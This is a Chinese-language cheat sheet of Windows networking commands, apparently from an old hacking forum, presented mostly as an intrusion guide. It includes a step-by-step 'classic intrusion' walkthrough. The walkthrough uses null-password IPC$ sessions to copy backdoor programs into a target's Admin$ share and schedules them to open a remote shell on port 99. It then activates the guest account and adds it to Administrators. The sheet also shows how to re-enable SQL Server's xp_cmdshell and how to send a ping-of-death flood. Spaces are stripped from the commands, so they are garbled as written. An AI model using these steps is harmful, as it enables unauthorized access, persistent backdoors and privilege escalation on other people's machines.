NETUSE使用 net use 映射

netshareabc$=c:
将c:盘映射为abc$(加了“$”之后为隐藏的共享目录)
netsharec$/del
禁止C$共享
netusez:\*.*.*.*C$
把*.*.*.*(IP)的共享C$映射为本地的Z：盘
netusec:/del
删除映射的c盘
netuse*/del/y
删除全部
netstart
显示本地主机当前服务
netstarttelnet
启动Telnet服务
netstartServer
启动Server服务(IPC$和共享要*这个服务)
netstopMessenger
停止信使服务(不会在有烦人的Win的弹出广告了)!
netstopserver
停止Server服务(关了这服务,远程的机子就不能查看你的共享和用IPC$入侵)
netuser
得到本地主机的用户列表
netuserguest/active:yes
将停用的guest帐号激活(变为可用)
netuserguest888888
把Guest帐号的密码改为888888
netlocalgroupAdministratorsguest/add
把Guest加到Administrators组中(这样你就有了超级权限了)
netview\*.*.*.*
查看指定IP主机上的共享
nbtstat-A*.*.*.*
得到远程主机的NetBIOS用户名列表
netshare
查看本地主机的共享资源(本地的默认共享也可以看到)
netuse\*.*.*.*ipc$""/user:""
建立空连接
telnet*.*.*.*90
连接对方机子的telnet,端口为90
ipconfig
查看本机的IP信息
入侵ipc过程序命令
--------------------------------------------------------

netuse\*.*.*.*ipc$""/user:"Administrator"
建立用户名为Administrator密码为空的连接

copyserver1.exe\*.*.*.*Admin$system32
即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内

nettime\*.*.*.*
查看远程主机的当前时间

at\*.*.*.*14:00server1.exe
在对方机子添加一个在14:00运行server1.exe的任务
-------------------------------------------------------

3389DOS开启
-------------------------------------------------------
echo[Components]>c:sql

echoTSEnable=on>>c:sql

sysocmgr/i:c:winntinfsysoc.inf/u:c:sql/q

---------
C:>dirc:sysoc.inf/s
检查INF文件的位置

C:>dirc:sysocmgr.*/s
检查组件安装程序

-------------------------------------------------------
queryuser
查看正在使用的用户

logoffuser
踢掉正在使用帐号的ID（这里的ID不是你的帐号）

-------------------------------------------------------
删除Radmin服务

r_server.exe/stop

r_server/uninstall/silence

-------------------------------------------------------
开启cmdshell的SQL语句
EXECsp_addextendedprocxp_cmdshell,@dllname='xplog70.dll'
判断存储扩展是否存在
Selectcount(*)frommaster.dbo.sysobjectswherextype='X'andname='xp_cmdshell'
返回结果为1就OK
恢复xp_cmdshell
Execmaster.dbo.addextendedproc'xp_cmdshell','xplog70.dll';selectcount(*)frommaster.dbo.sysobjectswherextype='X'andname='xp_cmdshell'
返回结果为1就OK
否则上传xplog7.0.dll
Execmaster.dbo.addextendedproc'xp_cmdshell','C:WinNtSystem32xplog70.dll'
堵上cmdshell的SQL语句
sp_dropextendedproc"xp_cmdshell"
Selectcount(*)frommaster.dbo.sysobjectswherextype='X'andname='xp_cmdshell'

netuse命令的使用2006-07-3107:481、建立IPC$、admin$连接：netuse\计算机名或IPipc$(输入administrator与
password)
2查看连接共享：netshare
3、映射共享到本地：netu***：\计算机或IP共享名称如：netu***:\pc1c$
netuse\ipipc$"密码"/user:"用户名"建立IPC非空链接
netuseh:\ipc$"密码"/user:"用户名"直接登陆后映射对方C：到本地为H:
netuseh:\ipc$登陆后映射对方C：到本地为H:
netuse\ipipc$/del删除IPC链接
netuseh:/del删除映射对方到本地的为H:的映射
netuser用户名　密码　/add建立用户
netuserguest/active:yes激活guest用户
netuser查看有哪些用户
netuser帐户名查看帐户的属性
netlocalgroupadministrators用户名/add把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数
netstart查看开启了哪些服务
netstart服务名　开启服务；(如:netstarttelnet，netstartschedule)
netstop服务名停止某服务
nettime\目标ip查看对方时间
nettime\目标ip/set设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
netview查看本地局域网内开启了哪些共享
netview\ip查看对方局域网内开启了哪些共享
netconfig显示系统网络设置
netlogoff断开连接的共享
netpause服务名暂停某服务
netsendip"文本信息"向对方发信息
edit打开某文件
netver局域网内正在使用的网络连接类型和信息
netshare查看本地开启的共享
netshareipc$开启ipc$共享
netshareipc$/del删除ipc$共享
netsharec$/del删除C：共享
netuserguest12345用guest用户登陆后用将密码改为12345
netpassword密码更改系统登陆密码
netstat-a查看开启了哪些端口,常用netstat-an
netstat-n查看端口的网络连接情况，常用netstat-an
netstat-v查看正在进行的工作
netstat-p协议名例：netstat-ptcq/ip查看某协议使用情况（查看tcp/ip协议使用情况）
netstat-s查看正在使用的所有协议使用情况
nbtsta*-***对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写
tracert-参数ip(或计算机名)跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。
pingip(或域名)向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。
ping-t-l65550ip死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig(winipcfg)用于windowsNT及XP(windows9598)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息
tlist-t以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
kill-F进程名加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
del-F文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、
/A-A表示

删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR*.*”表示删除当前目录下所有只读文件，“DEL/A-S*.*”表示删除
当前目录下除系统文件以外的所有文件

经典入侵模式
这个入侵模式太经典了
1.C:/>netuse//127.0.0.1/IPC$""/user:"admintitrators"
这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，
就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，
输入administrators，命令即可成功完成。
2.C:/>copysrv.exe//127.0.0.1/admin$
先复制srv.exe上去，在流光(下面提供下载)ools目录下就有（这里的$是指admin用户的c:/winnt/system32/，大家还可以使用c$、d$，意思
是C盘与D盘，这看你要复制到什么地方去了）。
3.C:/>nettime//127.0.0.1
查查时间，发现127.0.0.1的当前时间是2002/3/19上午11:00，命令成功完成。
4.C:/>at//127.0.0.111:05srv.exe
用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）
5.C:/>nettime//127.0.0.1
再查查到时间没有？如果127.0.0.1的当前时间是2002/3/19上午11:05，那就准备开始下面的命令。
6.C:/>telnet127.0.0.199
这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口
的Shell。
虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了
7.C:/>copyntlm.exe//127.0.0.1/admin$
用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。
8.C:/WINNT/system32>ntlm
输入ntlm启动（这里的C:/WINNT/system32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候
，就说明已经启动正常。然后使用"netstarttelnet"来开启Telnet服务！
9.Telnet127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,
哈哈)
为了以防万一,我们再把guest激活加到管理组
10.C:/>netuserguest/active:yes
将对方的Guest用户激活
11.C:/>netuserguest1234
将Guest的密码改为1234,或者你要设定的密码
12.C:/>netlocalgroupadministratorsguest/add
将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机)